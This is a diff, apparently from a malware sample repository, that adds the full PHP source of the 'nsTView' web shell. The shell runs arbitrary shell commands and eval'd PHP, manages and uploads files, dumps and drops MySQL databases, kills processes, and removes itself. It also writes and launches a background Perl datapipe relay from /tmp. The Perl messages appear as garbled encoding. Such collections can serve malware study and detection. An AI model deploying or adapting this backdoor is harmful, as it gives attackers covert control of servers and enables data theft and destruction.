\$cbuffer\n\" if \$log; + } + + if (\$th && (vec(\$eout, fileno(\$th), 1) || vec(\$rout, fileno(\$th), 1))) { + print \"Child: Æäåì äàííûõ.\n\" if \$log; + my \$result = sysread(\$th, \$cbuffer, 1024); + if (!defined(\$result)) { + print STDERR \"Child: Íåâîçìîæíî ñ÷èòàò?äàííûå: \$!\n\"; + exit 0; + } + + if (\$result == 0) { + print \"Child: Ïðîèçîøë?îòñîåäèíåíèå.\n\" if \$log; + exit 0; + } + + print \"Child: Äàííûå: \$cbuffer\n\" if \$log; + } + + if (\$fh && \$tbuffer) { + (print \$fh \$tbuffer); + } + + while (my \$len = length(\$tbuffer)) { + print \"Child: Îòïðàâ?åì \$len áàéò.\n\" if \$log; + my \$res = syswrite(\$th, \$tbuffer, \$len); + print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log; + if (\$res > 0) { + \$tbuffer = substr(\$tbuffer, \$res); + } else { + print STDERR \"Child: Íåâîçìîæíî îòïðàâèò?äàííûå: \$!\n\"; + } + } + + while (my \$len = length(\$cbuffer)) { + print \"Child: Îòïðàâ?åì \$len áàéò êëèåíò?\n\" if \$log; + my \$res = syswrite(\$ch, \$cbuffer, \$len); + print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log; + if (\$res > 0) { + \$cbuffer = substr(\$cbuffer, \$res); + } else { + print STDERR \"Child: Íåâîçìîæíî îòïðàâèò?äàííûå: \$!\n\"; + } + } + } +} + +"; + +if(is_writable("/tmp")){ +$fp=fopen("/tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl /tmp/nst_perl_datapipe.pl &"); +unlink("/tmp/nst_perl_datapipe.pl"); +}else{ +if(is_writable(".")){ +mkdir(".nst_datapipe_tmp"); +$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w"); +fwrite($fp,"$datapipe_pl"); +passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &"); +unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl"); +rmdir(".nst_datapipe_tmp"); +} +} +$show_ps="1"; + +}#end of datapipe perl + + + + + +if($show_ps=="1"){ +print "
    [ps ux]


    "; +print "
    ";
    +passthru("ps ux");
    +print "


    "; +} + + + +echo "
    md5:
    +
    +md5 online encoder/decoder (brutforce) (php) - [DOWNLOAD] +
    +"; +@$md5=@$_POST['md5']; +if(@$_POST['md5']){ echo "md5:
    ";} +echo "
    +
    base64 e/d:

    "; +if(@$_POST['base64']){ +@$base64=$_POST['base64']; +echo " +Encode:

    +Decode:


    ";} +echo "
    +
    DES:

    +John The Ripper [Web]

    "; +if(@$_POST['des']){ +@$des=@$_POST['des']; +echo "Des:
    ";} + +print " +eval: +(example: print \"Hello World\";) +
    +<?
    +
    +?>

    + +

    +"; + +function eval_sl($editf){ +if(get_magic_quotes_gpc()==1){ +$editf=stripslashes($editf); +} +return $editf; +} + + +if($_POST['eval']){ +print "RESULT:

    "; +eval(eval_sl($_POST['eval'])); +print "

    "; + +print "PHP:
    \r\n\r\n"; +print "<?\r\n"; +print "
    "; +print htmlspecialchars(eval_sl(($_POST['eval']))); +print "
    "; +print "?>\r\n\r\n


    "; + +} + +echo $copyr; +exit;} + +if(@$_GET['replace']=="1"){ +$ip=@$_SERVER['REMOTE_ADDR']; +$d=$_GET['d']; +$e=$_GET['e']; +@$de=$d."/".$e; +$de=str_replace("//","/",$de); +$e=@$e; +echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
    "; +echo " +Replace tool:
    +(You can replace any text)
    +File: $de
    +
    +1. Your ip.
    +2. microsoft.com ip :)
    +Replace this by this + +
    +"; + +if(@$_POST['doit']){ +@$thisX=$_POST['thisX']; +@$bythis=$_POST['bythis']; +@$e=$_GET['e']; +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$rpl = @fread ($fd, @filesize ($filename)); +$re=str_replace("$thisX","$bythis",$rpl); +$x=@fopen("$d/$e","w"); +@fwrite($x,"$re"); +echo "
    $thisX Replaced by $bythis
    +[VIew file]


    "; + +} +echo $copyr; +exit;} + + +if(@$_GET['t']=="upload"){ +echo "
    +* Mass upload *
    +File upload:
    +
    +
    +
    +New file name:
    + (if empty, it will be default)
    + +

    +"; + +if(@$_POST['uploadf']){ +$where=$_POST['where']; +$newf=$_POST['newf']; +$where=str_replace("//","/",$where); +if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;} +$uploadfile = "$where/".$newf; +if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) { +$uploadfile=str_replace("//","/",$uploadfile); +echo "
    Uploaded to $uploadfile

    "; +}else{ +echo "
    Error

    ";} +} +} + +if(@$_GET['t']=="massupload"){ +echo " +Mass upload:
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +

    "; + +if(@$_POST['massupload']){ +$where=@$_POST['where']; +$uploadfile1 = "$where/".@$_FILES['text1']['name']; +$uploadfile2 = "$where/".@$_FILES['text2']['name']; +$uploadfile3 = "$where/".@$_FILES['text3']['name']; +$uploadfile4 = "$where/".@$_FILES['text4']['name']; +$uploadfile5 = "$where/".@$_FILES['text5']['name']; +$uploadfile6 = "$where/".@$_FILES['text6']['name']; +$uploadfile7 = "$where/".@$_FILES['text7']['name']; +$uploadfile8 = "$where/".@$_FILES['text8']['name']; +$uploadfile9 = "$where/".@$_FILES['text9']['name']; +$uploadfile10 = "$where/".@$_FILES['text10']['name']; +$uploadfile11 = "$where/".@$_FILES['text11']['name']; +$uploadfile12 = "$where/".@$_FILES['text12']['name']; +$uploadfile13 = "$where/".@$_FILES['text13']['name']; +$uploadfile14 = "$where/".@$_FILES['text14']['name']; +$uploadfile15 = "$where/".@$_FILES['text15']['name']; +$uploadfile16 = "$where/".@$_FILES['text16']['name']; +$uploadfile17 = "$where/".@$_FILES['text17']['name']; +$uploadfile18 = "$where/".@$_FILES['text18']['name']; +$uploadfile19 = "$where/".@$_FILES['text19']['name']; +$uploadfile20 = "$where/".@$_FILES['text20']['name']; +if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile1
    ";} +if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile2
    ";} +if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile3
    ";} +if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile4
    ";} +if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile5
    ";} +if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile6
    ";} +if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile7
    ";} +if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile8
    ";} +if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile9
    ";} +if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile10
    ";} +if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile11
    ";} +if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile12
    ";} +if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile13
    ";} +if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile14
    ";} +if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile15
    ";} +if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile16
    ";} +if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile17
    ";} +if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile18
    ";} +if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile19
    ";} +if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { +$where=str_replace("\\\\","\\",$where); +echo "Uploaded to $uploadfile20
    ";} +} +echo $copyr; +exit;} + +if(@$_GET['yes']=="yes"){ +$d=@$_GET['d']; $e=@$_GET['e']; +unlink($d."/".$e); +$delresult="Success $d/$e deleted "; +} +if(@$_GET['clean']=="1"){ +@$e=$_GET['e']; +$x=fopen("$d/$e","w"); +fwrite($x,""); +echo ""; +exit; +} + + +if(@$_GET['e']){ +$d=@$_GET['d']; +$e=@$_GET['e']; +$pinf=pathinfo($e); +if(in_array(".".@$pinf['extension'],$images)){ +echo ""; +exit;} +$filename="$d/$e"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$e; +$de=str_replace("//","/",$de); +if(is_file($de)){ +if(!is_writable($de)){echo "READ ONLY
    ";}} +echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
    "; +echo " +File contents:
    +$de +
    + + +
    +$c
    +
    +
    + +"; + +if(@$_GET['delete']=="1"){ +$delete=$_GET['delete']; +echo " +DELETE: Are you sure?
    +Yes || No +
    +"; +if(@$_GET['yes']=="yes"){ +@$d=$_GET['d']; @$e=$_GET['e']; +echo $delresult; +} +if(@$_GET['no']){ +echo " +"; +} + + +} #end of delete +echo $copyr; +exit; +} #end of e + +if(@$_GET['edit']=="1"){ +@$d=$_GET['d']; +@$ef=$_GET['ef']; +$e=$ef; +if(is_file($d."/".$ef)){ +if(!is_writable($d."/".$ef)){echo "READ ONLY
    ";}} +echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy]
    "; +$filename="$d/$ef"; +$fd = @fopen ($filename, "r"); +$c = @fread ($fd, @filesize ($filename)); +$c=htmlspecialchars($c); +$de=$d."/".$ef; +$de=str_replace("//","/",$de); +echo " +Edit:
    +$de
    "; + +if(!@$_POST['save']){ +print " +
    + + +
    +

    +"; +} +if(@$_POST['save']){ +$editf=@$_POST['editf']; + +if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){ +$editf=stripslashes($editf); +} + +$f=fopen($filename,"w+"); +fwrite($f,"$editf"); +echo "
    +File edited. +"; +exit; +} +echo $copyr; +exit; +} + + + +echo" + + +"; +$dirs=array(); +$files=array(); +$dh = @opendir($d) or die("
    Filename
    Tools
    Size
    Owner/Group
    Perms
    Permission Denied or Folder/Disk does not exist

    $copyr
    "); +while (!(($file = readdir($dh)) === false)) { +if ($file=="." || $file=="..") continue; +if (@is_dir("$d/$file")) { + $dirs[]=$file; +}else{ + $files[]=$file; + } + sort($dirs); + sort($files); + +$fz=@filesize("$d/$file"); +} + +function perm($perms){ +if (($perms & 0xC000) == 0xC000) { + $info = 's'; +} elseif (($perms & 0xA000) == 0xA000) { + $info = 'l'; +} elseif (($perms & 0x8000) == 0x8000) { + $info = '-'; +} elseif (($perms & 0x6000) == 0x6000) { + $info = 'b'; +} elseif (($perms & 0x4000) == 0x4000) { + $info = 'd'; +} elseif (($perms & 0x2000) == 0x2000) { + $info = 'c'; +} elseif (($perms & 0x1000) == 0x1000) { + $info = 'p'; +} else { + $info = 'u'; +} +$info .= (($perms & 0x0100) ? 'r' : '-'); +$info .= (($perms & 0x0080) ? 'w' : '-'); +$info .= (($perms & 0x0040) ? + (($perms & 0x0800) ? 's' : 'x' ) : + (($perms & 0x0800) ? 'S' : '-')); +$info .= (($perms & 0x0020) ? 'r' : '-'); +$info .= (($perms & 0x0010) ? 'w' : '-'); +$info .= (($perms & 0x0008) ? + (($perms & 0x0400) ? 's' : 'x' ) : + (($perms & 0x0400) ? 'S' : '-')); +$info .= (($perms & 0x0004) ? 'r' : '-'); +$info .= (($perms & 0x0002) ? 'w' : '-'); +$info .= (($perms & 0x0001) ? + (($perms & 0x0200) ? 't' : 'x' ) : + (($perms & 0x0200) ? 'T' : '-')); +return $info; +} + + +for($i=0; $i0 $linkd
    DIR 
    $owner/$group$info"; +} + +for($i=0; $i2 $files[$i]
    [options]$siz
    $owner/$group$info"; +} + +echo ""; +echo $copyr; + +?> + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Nst.f b/PHP/Backdoor.PHP.Nst.f new file mode 100644 index 00000000..17bd3ac6 --- /dev/null +++ b/PHP/Backdoor.PHP.Nst.f @@ -0,0 +1,2136 @@ +nsTView $ver:: nst.void.ru +
    +
    +
    +nsTView $ver :: nst.void.ru
    +
    +
    +Password:
    + +
    +Host: ".$_SERVER["HTTP_HOST"]."
    +IP: ".gethostbyname($_SERVER["HTTP_HOST"])."
    +Your ip: ".$ip." +
    +");} + +} +$d=$_GET['d']; + +function adds($editf){ +#if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +#} +return $editf; +} +function adds2($editf){ +if(get_magic_quotes_gpc()==0){ +$editf=addslashes($editf); +} +return $editf; +} + +$f = "nst_sql.txt"; +$f_d = $_GET['f_d']; + +if($_GET['download']){ +$download=$_GET['download']; +header("Content-disposition: attachment; filename=\"$download\";"); +readfile("$d/$download"); +exit;} + +if($_GET['dump_download']){ +header("Content-disposition: attachment; filename=\"$f\";"); +header("Content-length: ".filesize($f_d."/".$f)); +header("Expires: 0"); +readfile($f_d."/".$f); +if(is_writable($f_d."/".$f)){ +unlink($f_d."/".$f); +} +die; +} + + +$images=array(".gif",".jpg",".png",".bmp",".jpeg"); +$whereme=getcwd(); +@$d=@$_GET['d']; +$copyr = "
    nsTView $ver
    o... Network security team ...o
    "; +$php_self=@$_SERVER['PHP_SELF']; +if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} +if(!isset($d)){$d=$whereme;} +$d=str_replace("\\","/",$d); +if(@$_GET['p']=="info"){ +@phpinfo(); +exit;} +if(@$_GET['img']=="1"){ +@$e=$_GET['e']; +header("Content-type: image/gif"); +readfile("$d/$e"); +} +if(@$_GET['getdb']=="1"){ +header('Content-type: application/plain-text'); +header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); +} +print "nsT View $ver + + +"; +print " + +"; +if($os=="unix"){ echo " + +";} echo" + +"; +if($os=="win"){ echo " +";}else{echo "";} +print ""; + + + + + +if($_GET['p']=="ftp"){ +print "
    0"; +$expl=explode("/",$d); +$coun=count($expl); +if($os=="unix"){echo "/";} +else{ + echo "$expl[0]/";} +for($i=1; $i<$coun; $i++){ + @$xx.=$expl[$i]."/"; +$sls="$expl[$i]/"; +$sls=str_replace("//","/",$sls); +$sls=str_replace("/'>/","/'>",$sls); +print $sls; +} +if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";} +if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";} +echo "
    id: ".@exec('id')."
    uname -a: ".@exec('uname -a')."
    Your IP: [$ip] Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."] Server H.D.: [".$_SERVER["HTTP_HOST"]."]
    +[Safe mode: $safe_m] [Register globals: $reg_g]
    +[Back] +[Home] +[Shell (1) (2)] +[Upload] +[Tools] +[PHPinfo] +[DEL Folder] +[SQL] +[Self Remover] +
    +
    < +A +B +C +D +E +F +G +H +I +J +K +L +M +N +O +P +Q +R +S +T +U +V +W +X +Y +Z +
     
    +:: Create folder :: +Create file :: +Read file if safe mode is On ::"; +if($os=="unix"){ +print "PS table ::"; +} +print "
    "; + + + +print "
    "; +print $copyr; +exit; +} + + + + + + + + + + +if(@$_GET['p']=="sql"){ +print ""; +### + +$f_d = $_GET['f_d']; +if(!isset($f_d)){$f_d=".";} +if($f_d==""){$f_d=".";} + +$php_self=$_SERVER['PHP_SELF']; +$delete_table=$_GET['delete_table']; +$tbl=$_GET['tbl']; +$from=$_GET['from']; +$to=$_GET['to']; +$adress=$_POST['adress']; +$port=$_POST['port']; +$login=$_POST['login']; +$pass=$_POST['pass']; +$adress=$_GET['adress']; +$port=$_GET['port']; +$login=$_GET['login']; +$pass=$_GET['pass']; +$conn=$_GET['conn']; +if(!isset($adress)){$adress="localhost";} +if(!isset($login)){$login="root";} +if(!isset($pass)){$pass="";} +if(!isset($port)){$port="3306";} +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} + + +?> + + + + + + + + + + + +
    Address:
    Login:
    Pass:
    PHP v".@phpversion()."
    mySQL v".@mysql_get_server_info()."
    ";}?>
    + + + +Error: ".mysql_error()."
    "); +if($serv){$status="Connected. :: Log out";}else{$status="Disconnected.";} +print "Status: $status

    "; # #D7FFA8 +print "
    "; +print "
    [db]
    "; +print ""; +$res = mysql_list_dbs($serv); +while ($str=mysql_fetch_row($res)){ +print "[DEL][DUMP] $str[0]
    "; +$tc++; +} +$baza=$_GET['baza']; +$db=$_GET['db']; +print "[Total db: $tc]
    "; +if($baza){ +print "
    db: [$db]

    "; +$result=@mysql_list_tables($db); +while($str=@mysql_fetch_array($result)){ +$c=mysql_query ("SELECT COUNT(*) FROM $str[0]"); +$records=mysql_fetch_array($c); + +if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);} +if($records[0]=="0"){ +print "[D][R][$records[0]] $str[0]
    "; +}else{ +print "[D][R][$records[0]] $str[0]
    "; +} +mysql_free_result($c); +$total_t++; +} +print "
    Total tables: $total_t"; + print "
    ";
    +for($i=0; $i<$s4ot+10; $i++){print " ";}
    +                                print "
    "; +} #end baza + + + + +# delete table +if(isset($delete_table)){ +mysql_select_db($_GET['db']) or die("".mysql_error().""); +mysql_query("DROP TABLE IF EXISTS $delete_table") or die("".mysql_error().""); +print "
    Table [ $delete_table ] :: Deleted success!"; +print ""; +} +# end of delete table + +# delete database +if(isset($_GET['delete_db'])){ +mysql_drop_db($_GET['delete_db']) or die("".mysql_error().""); +print "
    Database ".$_GET['delete_db']." :: Deleted Success!"; +print ""; +} +# end of delete database + +# delete row +if(isset($_POST['delete_row'])){ +$_POST['delete_row'] = base64_decode($_POST['delete_row']); +mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("".mysql_error().""); +$del_result = "
    Deleted Success!
    ".$_POST['delete_row']; +print ""; +} +# end of delete row + + +$vn=$_GET['vn']; +print "
    "; +print "Database: $db => $vn"; + +# edit row +if(isset($_POST['edit_row'])){ +$edit_row=base64_decode($_POST['edit_row']); + +$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("".mysql_error().""); +print "

    + + "; +print ""; +print ""; +print " Update
    + Insert new

    "; + + +$i=0; +while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){ +foreach($mn as $key =>$val){ +$type = mysql_field_type($r_edit, $i); +$len = mysql_field_len($r_edit, $i); +$del .= "`$key`='".adds($val)."' AND "; +$c=strlen($val); +$val=htmlspecialchars($val, ENT_NOQUOTES); +$str=" "; +$buff .= ""; +$i++; +} + +} +$delstring=base64_encode($del); +print ""; +print "$buff
    RowValue
    $key
    ($type($len))
    $str

    "; +print "
    "; +if(!$_POST['makeupdate']){print "";} + + + + +if($_POST['makeupdate']){ +if($_POST['upd']=='update'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $iPHP var:
    \$sql=\"$up_string\";

    "; +print ""; +mysql_query($up_string) or die("".mysql_error().""); +}#end of make update + + + +if($_POST['upd']=='insert'){ +preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3); +$delstring=$_POST['delstring']; +$delstring=base64_decode($delstring); +$delstring = substr($delstring, 0, strlen($delstring)-5); + +for($i=0; $i".mysql_error().""); +print "PHP var:
    \$sql=\"$make_insert\";

    "; +print ""; +}#end of insert +}#end of update +} +# end of edit row + + +# insert new line +if($_GET['ins_new_line']){ +$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error().""); +print "
    +Insert new line in $tbl table

    "; +print ""; +while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) { +foreach ($new_line as $key =>$next) { +$buff .= "$next "; +} +$expl=explode(" ",$buff); +$buff2 .= $expl[0]." "; +print " +"; +unset($buff); +} +print "
    $expl[0]
    ($expl[1])
    +
    +
    "; +if($_POST['mk_ins']){ +preg_match_all("/(.*?)\s/i",$buff2,$matches3); +for($i=0; $i".mysql_error().""); +print "PHP var:
    \$sql=\"$make_insert\";

    "; +print ""; +}#end of mk ins +}#end of ins new line + + + + + + +if(isset($_GET['rename_table'])){ +$rename_table=$_GET['rename_table']; +print "

    Rename $rename_table to

    +
    +

    +
    +
    +"; + +if(isset($_POST['new_name'])){ +mysql_select_db($db) or die("".mysql_error().""); +mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error().""); +print "
    Table $rename_table renamed to ".$_POST['new_name'].""; +print ""; +} + +}#end of rename + + +# dump table +if($_GET['dump']){ +if(!is_writable($f_d)){die("

    This folder $f_d isnt writable!
    Cannot make dump.

    +You can change temp folder for dump file in your browser!
    +Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
    +Then press enter
    +
    ");} +mysql_select_db($db) or die("".mysql_error().""); +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) Table ( $tbl ) +# --- eof --- + +"); +$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error().""); +$row = mysql_fetch_row($que); +fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n"); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$que = mysql_query("SELECT * FROM `$tbl`"); +if(mysql_num_rows($que)>0){ +while($row = mysql_fetch_assoc($que)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = implode("', '", $values); +$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n"; +fwrite($fp, $sql); +} +} +fclose($fp); +print ""; +}#end of dump + + + + +# db dump +if($_GET['dump_db']){ +$c=mysql_num_rows(mysql_list_tables($db)); +if($c>=1){ +print "

       Dump database $db"; +}else{ +print "

    Cannot dump database. No tables exists in $db db."; +die; +} +if(sizeof($tabs)==0){ +$res = mysql_query("SHOW TABLES FROM $db"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_row($res)){ +$tabs[] .= $row[0]; +} +} +} +$fp = fopen($f_d."/".$f,"w"); +fwrite($fp, "# nsTView.php v$ver +# Web: http://nst.void.ru +# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].") +# MySQL version: ".mysql_get_server_info()." +# PHP version: ".phpversion()." +# Date: ".date("d.m.Y - H:i:s")." +# Dump db ( $db ) +# --- eof --- + +"); +foreach($tabs as $tab) { +fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n"); +$res = mysql_query("SHOW CREATE TABLE `$tab`"); +$row = mysql_fetch_row($res); +$row[1]=str_replace("\n","\r\n",$row[1]); +fwrite($fp, $row[1].";\r\n\r\n"); +$res = mysql_query("SELECT * FROM `$tab`"); +if(mysql_num_rows($res)>0){ +while($row=mysql_fetch_assoc($res)){ +$keys = join("`, `", array_keys($row)); +$values = array_values($row); +foreach($values as $k=>$v) {$values[$k] = adds2($v);} +$values = join("', '", $values); +$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n"; +fwrite($fp, $sql); +}} +fwrite($fp, "\r\n\r\n\r\n"); +} +fclose($fp); +print ""; +}#end of db dump + + + + + + +$vnutr=$_GET['vnutr']; +$tbl=$_GET['tbl']; +if($vnutr and !$_GET['ins_new_line']){ +print "
    "; + +mysql_select_db($db) or die(mysql_error()); +$c=mysql_query ("SELECT COUNT(*) FROM $tbl"); +$cfa=mysql_fetch_array($c); +mysql_free_result($c); +print " +Total: $cfa[0] +
    +From: +To: + + + + + + + + + + + + [DOWNLOAD] [INSERT] [DUMP] +
    "; +$vn=$_GET['vn']; +$from=$_GET['from']; +$to=$_GET['to']; +$from=$_GET['from']; +$to=$_GET['to']; +if(!isset($from)){$from=0;} +if(!isset($to)){$to=50;} +$query = "SELECT * FROM $vn LIMIT $from,$to"; +$result = mysql_query($query); +$result1= mysql_query($query); +print $del_result; +print ""; +for ($i=0;$i $name ($type($len))"; +} +print "
    ";
    +
    +while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
    +foreach($mn as $key=>$inside){
    +$buffer1 .= "`$key`='".adds($inside)."' AND ";
    +$b1 .= "
    "; +} +$buffer1 = substr($buffer1, 0, strlen($buffer1)-5); +$buffer1 = base64_encode($buffer1); +print "\r\n"; +print $b1; +print ""; +unset($b1); +unset($buffer1); +} + + + +mysql_free_result($result); +print "
    ".htmlspecialchars($inside, ENT_NOQUOTES)."  +
    + + +
    + + +
    +
    "; +} #end vnutr +print "
    "; +} # end $conn + + +### end of sql +print " "; +print $copyr; +die; +} + + +@$p=$_GET['p']; +if(@$_GET['p']=="selfremover"){ + print ""; +print "Are you sure?
    +Yes | No
    +Remove: "; +$path=__FILE__; +print $path; +print " ?"; +die; +} + +if($p=="yes"){ +$path=__FILE__; +@unlink($path); +$path=str_replace("\\","/",$path); +if(file_exists($path)){$hmm="NOT DELETED!!!"; +print "FILE $path NOT DELETED"; +}else{$hmm="DELETED";} +print ""; + +} + + + +if($os=="unix"){ +function fastcmd(){ +global $fast_commands; +$c_f=explode("\n",$fast_commands); +$c_f=count($c_f)-2; +print " +
    +Total commands: $c_f
    +
    + +
    +"; +} +}#end of os unix + + +if($os=="win"){ +function fastcmd(){ +global $fast_commands_win; +$c_f=explode("\n",$fast_commands_win); +$c_f=count($c_f)-2; +print " +
    +Total commands: $c_f
    +
    + +
    +"; +} +}#end of os win + + +echo " +"; +if(@$_GET['sh311']=="1"){echo "
    cmd
    pwd: +"; +chdir($d); +echo getcwd()."

    +Fast cmd:
    "; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +Insert pwd +

    +"; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "
    ";
    +print `$sh3`;
    +echo "
    "; +} +} + +if(@$_GET['sh311']=="2"){ +echo "
    cmd
    +pwd: +"; +chdir($d); +echo getcwd()."

    +Fast cmd:
    "; +fastcmd(); +if($os=="win"){$d=str_replace("/","\\\\",$d);} +print " +Insert pwd +

    "; +if(@$_POST['sh3']){ +$sh3=$_POST['sh3']; +echo "
    "; print `$sh3`; echo "
    ";} +echo $copyr; +exit;} + +if(@$_GET['delfl']){ +@$delfolder=$_GET['delfolder']; +echo "DELETE FOLDER: ".@$_GET['delfolder']."
    +(All files must be writable)
    +Yes || No

    +"; +echo $copyr; +exit; +} + + +$mkdir=$_GET['mkdir']; +if($mkdir){ +print "
    Create Folder in $d :

    +
    +New folder name:
    + +

    +"; +if($_POST['dir_n']){ +mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']); +print "Directory created success!"; +} +print $copyr; +die; +} + + +$mkfile=$_GET['mkfile']; +if($mkfile){ +print "
    Create file in $d :

    +
    +File name:
    +(example: hello.txt , hello.php)
    + +

    +"; +if($_POST['file_n']){ +$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']); +fwrite($fp,""); +print "File created success!"; +} +print $copyr; +die; +} + + +$ps_table=$_GET['ps_table']; +if($ps_table){ + +if($_POST['kill_p']){ +exec("kill -9 ".$_POST['kill_p']); +} + +$str=`ps aux`; + +# You can put here preg_match_all for other distrib/os +preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches); + + +print "
    PS Table :: Fast kill program
    +(p.s: Tested on Linux slackware 10.0)
    +
    "; +print "
    "; +for($i=0; $i"; +}#end of for +print "
    $expl[0]PID: ".$matches[1][$i]." :: ".$matches[3][$i]."
    Kill:


    "; +unset($str); +print $copyr; +die; +}#end of ps table + + +$read_file_safe_mode=$_GET['read_file_safe_mode']; +if($read_file_safe_mode){ + +if(!isset($_POST['l'])){$_POST['l']="root";} + +print "
    +Read file content using MySQL - when safe_mode, open_basedir is ON
    +
    + + + +
